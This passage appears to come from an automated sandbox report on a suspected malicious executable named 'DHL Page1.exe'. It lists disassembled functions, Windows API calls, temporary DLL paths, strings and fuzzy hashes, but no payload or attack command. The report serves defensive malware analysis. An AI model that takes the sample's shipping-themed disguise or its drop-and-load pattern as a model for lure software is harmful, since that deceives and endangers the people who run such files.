GetTickCount.KERNEL32 ref: 00402E6C
wsprintfW.USER32 ref: 00402E9A

Part of subcall function 00405393: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
Part of subcall function 00405393: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
Part of subcall function 00405393: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
Part of subcall function 00405393: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
Part of subcall function 00405393: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
Part of subcall function 00405393: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
Part of subcall function 00405393: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E

CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
ShowWindow.USER32(00000000,00000005), ref: 00402ECC

Part of subcall function 00402E17: MulDiv.KERNEL32(00058000,00000064,0005BFF3), ref: 00402E2C

Strings

... %d%%, xrefs: 00402E94

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 46287af5fdd5f1de6768bbfce07bad43e038cb8b2988b403a44dfbeb7f947424
Instruction ID: 5298ff6c404150fef068ea564290178245c54639b3e83396ddb2e121dc62f9f8
Opcode Fuzzy Hash: 46287af5fdd5f1de6768bbfce07bad43e038cb8b2988b403a44dfbeb7f947424
Instruction Fuzzy Hash: 9601C471480624ABC7216B60EF4CA9B7B68AB04B05B14003BF941B15E1DBF858958FDD

Function 00404C5D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C78
GetMessagePos.USER32 ref: 00404C80
ScreenToClient.USER32(?,?), ref: 00404C9A
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404CAC
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CD2

Strings

f, xrefs: 00404CAE

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction ID: c6d879f8106e07a7acade85d47e0aa80a2bd0c574060fa345ecf2cf46207e522
Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction Fuzzy Hash: 9D015E7190121CBAEB00DBA4DD85FFEBBBCAF58711F10012BBB51B61C0C7B49A018BA4

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CE08), ref: 00401E38

Strings

Tahoma, xrefs: 00401E1E

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: d1f771cd4411ada8962552a85e70aeb8769f02ea85257ba4ef179026fd5e666f
Instruction ID: 4158a01f97be71fecde82e93e8d02092eb0a88b9f45ff234c419069dd8c53e9e
Opcode Fuzzy Hash: d1f771cd4411ada8962552a85e70aeb8769f02ea85257ba4ef179026fd5e666f
Instruction Fuzzy Hash: E301B571544240EFE7105BB0EF8A79E3FB0AB95301F24097DF641B61E2CAF801558BAC

Function 00402D98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DB6
wsprintfW.USER32 ref: 00402DEA
SetWindowTextW.USER32(?,?), ref: 00402DFA
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C

Strings

unpacking data: %d%%, xrefs: 00402DD8, 00402DE8
verifying installer: %d%%, xrefs: 00402DDF

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: cd34b667c88f461d84bd87c456843896e1708f9162b963f3c6a51835bfa4288c
Instruction ID: 21dccee0f56e207788fa0171acdbed72568af18507d7a145866726ec9d514ae2
Opcode Fuzzy Hash: cd34b667c88f461d84bd87c456843896e1708f9162b963f3c6a51835bfa4288c
Instruction Fuzzy Hash: 12F0367054020CABDF205F50DD49BEE3B69FB40304F00803AFA05B51D0DBB95A658F99

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Function 004028C3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
GlobalFree.KERNEL32(?), ref: 0040296C
GlobalFree.KERNEL32(00000000), ref: 0040297F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 4da22ef413c1044a218c5b7a798ca91b963ccb849e4d2dcca53082b716824a3e
Instruction ID: 279f8726a3ce0b3592a3b9e8208213fc653f4cfc6ff5f76fbdf56dc0d25ebd4d
Opcode Fuzzy Hash: 4da22ef413c1044a218c5b7a798ca91b963ccb849e4d2dcca53082b716824a3e
Instruction Fuzzy Hash: EE218D71800524BBDF116FA5DE49D9E7E79EF09368F10023AF5507A2E1CB794D418B98

Function 004025AE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000400,?,?,00000021), ref: 004025FE
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000400,?,?,00000021), ref: 00402609

Strings

C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll, xrefs: 004025C9, 004025F0, 00402604, 00402650
C:\Users\user\AppData\Local\Temp\nsv4331.tmp, xrefs: 004025F7

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv4331.tmp$C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll
API String ID: 3109718747-918722644
Opcode ID: 83731c5805307a76dbb810d89470d25b030408685d051451989fd3234cd2a8da
Instruction ID: 217cd11262b5447a5c9dc46d06adace92062a2cc882c1e35563c8d2f4c0daf69
Opcode Fuzzy Hash: 83731c5805307a76dbb810d89470d25b030408685d051451989fd3234cd2a8da
Instruction Fuzzy Hash: 0B11C832A45714BEDB106FB1CE89E9F7665AF04358F20443BF502B61C1DAFC89824A9E

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00404B4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D288,0042D288,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404BF0
wsprintfW.USER32 ref: 00404BF9
SetDlgItemTextW.USER32(?,0042D288), ref: 00404C0C

Strings

%u.%u%s%s, xrefs: 00404BDA

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 3f95536588dffc27d7d1078d17c3f49a5e2063f4eec659c515b469063da87ecf
Instruction ID: ea04438874c8ccc674b692fe1e63f534d557bd3478eb06cd7af389f67dcbe87d
Opcode Fuzzy Hash: 3f95536588dffc27d7d1078d17c3f49a5e2063f4eec659c515b469063da87ecf
Instruction Fuzzy Hash: 1711E773A0412877DB106AAD9C42F9E329CDF85374F250237FE25F21D1DA78D82182E8

Function 00405BE8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403459,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00405BEE
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403459,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00405BF8
lstrcatW.KERNEL32(?,0040A014), ref: 00405C0A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE8

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction ID: a1155a52877bfb7c642b443cd4294b287dd5c95a49c3c648eb0d773082088996
Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction Fuzzy Hash: CFD0A731105634AAC2217B448D04CDF729C9F86304341407FF501B30A5C77C5D5187FD

Function 0040398B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000234,C:\Users\user\AppData\Local\Temp\,004037BE,?), ref: 0040399D
CloseHandle.KERNEL32(000002B0,C:\Users\user\AppData\Local\Temp\,004037BE,?), ref: 004039B1

Strings

C:\Users\user\AppData\Local\Temp\nsv4331.tmp, xrefs: 004039C1
C:\Users\user\AppData\Local\Temp\, xrefs: 00403990

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv4331.tmp
API String ID: 2962429428-1146303357
Opcode ID: e8f7966e18452049c2eee85f2c68902c91fb1c5427af02adfc640e1c3e42607e
Instruction ID: c599e588a799a675439da4f983f20d7a023f6578fa93528b29830c28325af9c2
Opcode Fuzzy Hash: e8f7966e18452049c2eee85f2c68902c91fb1c5427af02adfc640e1c3e42607e
Instruction Fuzzy Hash: 8DE0867194471496C130AF7CBD4A9863B286B453367244326F078F60F0C7789E574E9D

Function 00403D53 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(00000000,00433F20), ref: 00403DEB

Strings

"C:\Users\user\Desktop\DHL Page1.exe", xrefs: 00403D54
1033, xrefs: 00403D57, 00403D61, 00403DD2

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
